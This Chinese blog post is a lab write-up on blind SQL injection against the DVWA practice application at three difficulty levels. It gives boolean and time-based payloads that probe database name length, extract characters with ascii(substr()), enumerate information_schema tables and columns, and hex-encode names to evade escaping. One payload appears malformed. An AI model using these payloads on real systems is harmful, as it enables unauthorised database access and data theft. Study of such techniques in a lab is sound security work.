DVWA实验-sql盲注

最新推荐文章于 2024-06-26 10:53:50 发布
最新推荐文章于 2024-06-26 10:53:50 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 靶机实验报告 文章标签: web安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ping_Pig/article/details/100588113
版权

sql盲注:顾名思义,就是盲人注入,没有页面报错信息可以分析了,那么该怎么呢?盲注又有哪些测试的方法呢?

盲注的测试类型:

  1. boolean注入
  2. 时间注入

我们接下来就来介绍如何去测试sql注入盲注,我们还是用dvwa来举例子

Low级别

我们看到low级别同样是输入框,我们输入了正常的1,返回结果为:数据库中存在用户ID。

我们输入恶意字符,同样也返回结果为:数据库中缺少用户ID。

我们输入1'#返回正常

我们可以构造如下语句来判断注入的类型

1' and 1=1 #

返回结果存在

1' and 1=2#

返回结果不存在

由此我们可以判断出该输入框存在盲注,且注入类型为字符型注入

那么接下来我们可以构造sql语句来猜解数据库等

我们首先判断数据库长度,可以构造如下poc,使用length函数来判断字符串长度

1' and length(database())>5 #

返回结果

1' and length(database())>3#

由此我们可以看出当前链接数据库名的长度大于3小于5,长度为4

那么我们继续判断数据库名称的字符组成元素,此时利用substr()函数从给定的字符串中,从指定位置开始截取指定长度的字符串,分离出数据库名称的每个位置的元素,并分别将其转换为ASCII码,与对应的ASCII码值比较大小,找到比值相同时的字符,然后各个击破。

mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。

用法:
substr(string string,num start,num length);
string为字符串;
start为起始位置;
length为长度。

区别:
mysql中的start是从1开始的,而hibernate中的start是从0开始的。

在构造语句比较之前,先查询以下字符的ASCII码的十进制数值作为参考:

字符ASCII码-10进制 字符ASCII码-10进制
a97==>z122
A65==>Z90
048==>957
_95 @64

以上常规可能用到的字符的ASCII码取值范围:[48,122]
当然也可以扩大范围,在ASCII码所有字符的取值范围中筛选:[0,127]

1' and ascii(substr(database(),1,1))>88 #exists

猜解表的个数
1' and (select count(table_name) from information_schema.tables where table_schema=database())>2 #

猜解第一个表的表名长度

1' and   length( substr( (select count(table_name) from information_schema.tables where table_schema=database())1))>10#

猜解第一个表的表名的第一个字符

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #

我们可以依此类推,将剩下的字符一一爆破

Medium级别

判断是否存在注入,注入的类型
虽然前端界面上只能通过下拉列表选择数字,提交后查询显示的都是"exists",但是抓包工具修改数据重放之后是可以在工具中观察到响应数据有"MISSING"和"exists"两种返回结果的,如下:

由此我们可以判断出该级别存在注入,且注入类型为数字型注入,接下来我们猜解当前连接数据库长度,我们会用到sleep()这个函数以及if判断

对于 if(判断条件,sleep(n),1) 函数而言,若判断条件为真,则执行sleep(n)函数,达到在正常响应时间的基础上再延迟响应时间n秒的效果;若判断条件为假,则返回设置的1(真),此时不会执行sleep(n)函数

我们构造如下语句:

输入输出(Response Time)
1 and if(length(database())=4,sleep(2),1) #2031 ms
1 and if(length(database())=5,sleep(2),1) #26 ms
1 and if(length(database())>10,sleep(2),1) #30 ms

以上根据响应时间的差异,可知当前连接数据库名称的字符长度=4,此时确实执行了sleep(2)函数,使得响应时间比正常响应延迟2s(2000ms)

输入输出
1 and if(ascii(substr(database(),1,1))>88,sleep(2),1) #2049 ms
1 and if(ascii(substr(database(),1,1))>105,sleep(2),1) #19 ms

可以看到,当前连接数据库名称的第一个字符的ascii码为100,对应字母为d

后续过程与low级别类似,不过遇到了对特殊字符进行转义处理的时候,我们可以转换程16进制的形式绕过限制,从而提交到数据库进行查询.

如:猜解表中的字段名时,猜解字段名的长度(对字段值users进行16进制转换为0x7573657273

Low级别Medium级别
1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=8 #1 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)=8 #
---------------------------------------------------------
1 and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)=8,sleep(2),1) #

 

High级别

high级别通过代码分析,我们发现并没有做任何过滤,只是将查询输入页面和结果显示页面分开了,照样可以抓包绕过,并且代码只做了限制显示的结果数,没有做过滤。绕过和暴力破解的方式和low级别类似,对于LIMIT 1的限制输出记录数目,可以利用#注释其限制;服务端可能会随机执行sleep()函数,做执行,则延迟的时间是随机在2-4s,这样会对正常的基于时间延迟的盲注测试造成干扰。因此可以考虑用基于布尔的盲注进行测试:

借鉴的优秀文章

DVWA全等级SQL Injection(Blind)盲注--手工测试过程解析

 

Ping_Pig
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWASQL Injection(Blind)
谢公子的博客
08-05 2770
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
SQL盲注技术分享及dvwa靶场通关
最新发布
2301_79410179的博客
06-26 747
SQL注入是一种网络攻击技术,它利用Web应用程序对用户输入数据的合法性验证不足或过滤不严的漏洞,攻击者可以在应用程序中预定义的查询语句的结尾上添加恶意的SQL代码片段,从而欺骗数据库服务器执行非授权的任意查询,进一步获取数据库中的敏感信息或执行恶意操作。这里将布尔盲注又细分出了一个新的类型——报错盲注,这个报错盲注和我们通常说的报错注入是完全不同的东西,它的特点在于,当攻击者尝试注入SQL代码时,由于数据库查询的错误错误信息会被返回给攻击者,进而泄露了数据库的结构或内容。
DVWAsql注入(盲注
qq_74806534的博客
02-12 468
盲注,与一般注入的区别在于,一般地注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。
dvwaSQL注入&盲注
shannow_123的博客
06-05 3453
dvwaSQL注入sql注入手工注入思路low1.判断注入类型2.判断字段数3.确定显示的字段顺序4.获取当前数据库5.获取数据库中的表名6.获取表中的字段名7.下载数据mediumhighsql盲注lowmediumhigh sql注入 手工注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据...
DVWA笔记(7)--Blind SQL Injection(SQL盲注)
xiaopan233的博客
03-03 900
首先我们先了解一下SQL中基本的函数。 字符串截取类型: mid(str,num1,num2) 从指定位数开始截取字符串 第一个参数是字符串 第二个参数是从字符串的第几位开始截取 第二个参数是一共截取几个字符 如: select mid(‘hello’,1,2) 将会输出he。 substr(str,num1,nu...
E063-web安全应用-SQL盲注初级.pdf
12-02
SQL盲注SQL Blind Injection)是一种针对Web应用程序的安全漏洞利用方法,它发生在Web应用程序对用户输入的数据没有进行有效的验证和过滤时。在这种情况下,攻击者可以通过构造特定的查询字符串,尝试猜测数据库的...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
这个平台提供了多种类型的SQL注入场景,包括盲注、时间基注入、联合查询注入等,帮助用户深入理解SQL注入的工作原理和防范方法。 使用这些工具,初学者可以学习到Web应用程序安全的基础知识,而专业人士则可以提升...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
SQL 盲注 实验
m0_63645854的博客
04-10 413
通过手工 SQL 盲注分别完成 DVWA 的 Low,Medium,High 级别的 SQL 盲注实验。在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型。第一个字符为d,按照上一步的方法,逐个猜解出整个数据库名:dvwa。拦截数据包后,第一个数据包正常放行,修改第二个数据包,在。DVWA 的 Medium 级别的 SQL 盲注实验。按照上一步的方法,逐个猜解出整个数据库名:dvwa。按照上一步的方法,逐个猜解出整个数据库名:dvwa。(4)确认当前数据库名的第一个字符。
Sql-Inject盲注
qq_45680080的博客
11-03 208
什么是盲注 在有些情况下,后台使用了错误消息屏蔽方法(比如@ )屏蔽了报错 此时无法在根据报错信息来进行注入的判断。 这种情况下的注入,称为“盲注" 根据表现形式的不同,盲注又分为based boolean和based time两种类型 基于boolean的盲注主要表现症状: 0.没有报错信息 1.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1)(真与假) 2.在正确的...
DVWA sql盲注手工
永不垂头的博客
08-03 385
学习笔记—DVWA sql盲注手工 一、dvwasql盲注手工 1’and ascii(substr(database(),2,1))>'97 exists 1’and ascii(substr(database(),2,1))<'122 exists 1’and ascii(substr(database(),2,1))<'119 exists 1’and ascii(substr(database(),2,1))<'118 MISSING 1’and ascii(subs
sql-inject漏洞盲注
qq_45721814的博客
11-10 144
什么是盲注 base——time 接着我们可以到pikachu上进行测试 然后我们把我们之前测试的东西全输入一遍,然后会发现没有任何反应接着我们把网页控制台打开 我们可以输入一个命令让网页5秒后再运行我们可以查看它的时间线,就发现它确实是5秒才运行就说明这个指令成功了,就说明它存在时间注入漏洞,然后我们就可以实验了 我们可以改成任何一个字符让它运行,如果它休息了5秒才运行说明我们猜对了如...
sql注入之盲注(纯原创)
qq_56438857的博客
08-02 344
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。若有查询结果,就证明后面这东西是对的。这里后面是数据库名字的第一个字符的ascii码值。这里区别于前面的是,这里用的是query(),而之前用的execute()。这里之所以用limit限制,是因为源码要求查询结果只能有一条。,之前一直靠的错误回显来窃取关键信息的。...
DVWA靶场-sql盲注
zeroone的博客
03-11 1363
第八关:SQL Injection(Blind) 盲注       SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 Low <?php if( isset( $_GET[ 'Submit' ] )
dvwa-sql盲注
01mx的博客
02-05 438
SQL盲注 VS 普通SQL注入: 普通SQL注入: 1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 2.一般在页面上直接就会显示执行sql语句的结果 SQL盲注:(不显示错误信息,不能在前端显示) 1.一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or die语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 2.一般在页面上不会直接显示sql执行的结果 3.有可能出现不确定sql是否执行的情况 SQL盲注-测试流程 1.
DVWA学习
个人博客
08-10 278
DVWA-SQL注入/low <?php if(isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' )
dvwa靶场sql盲注
08-15
靶场SQL盲注是指在DVWA(Damn Vulnerable Web Application)这个靶场中进行的SQL注入攻击。靶场中有一个名为dvwa的数据库,我们可以通过一系列的注入语句来探测这个数据库中的表的数量和表名的长度。 首先,通过布尔盲注的方式,我们可以使用一些条件语句来判断表的数量。比如,我们可以使用以下语句来判断表的数量是否为1: ```sql 1' and (select count(table_name) from information_schema.tables where table_schema=database())=1# ``` 如果返回结果为真,则说明表的数量为1。同样地,我们可以使用以下语句来判断表的数量是否大于2: ```sql 1' and (select count(table_name) from information_schema.tables where table_schema=database())>2# ``` 如果返回结果为假,则说明表的数量大于2。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA——SQL盲注(全等级)](https://blog.csdn.net/qq_45833260/article/details/125762606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [DVWAsql注入——盲注](https://blog.csdn.net/Williamanddog/article/details/128404430)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值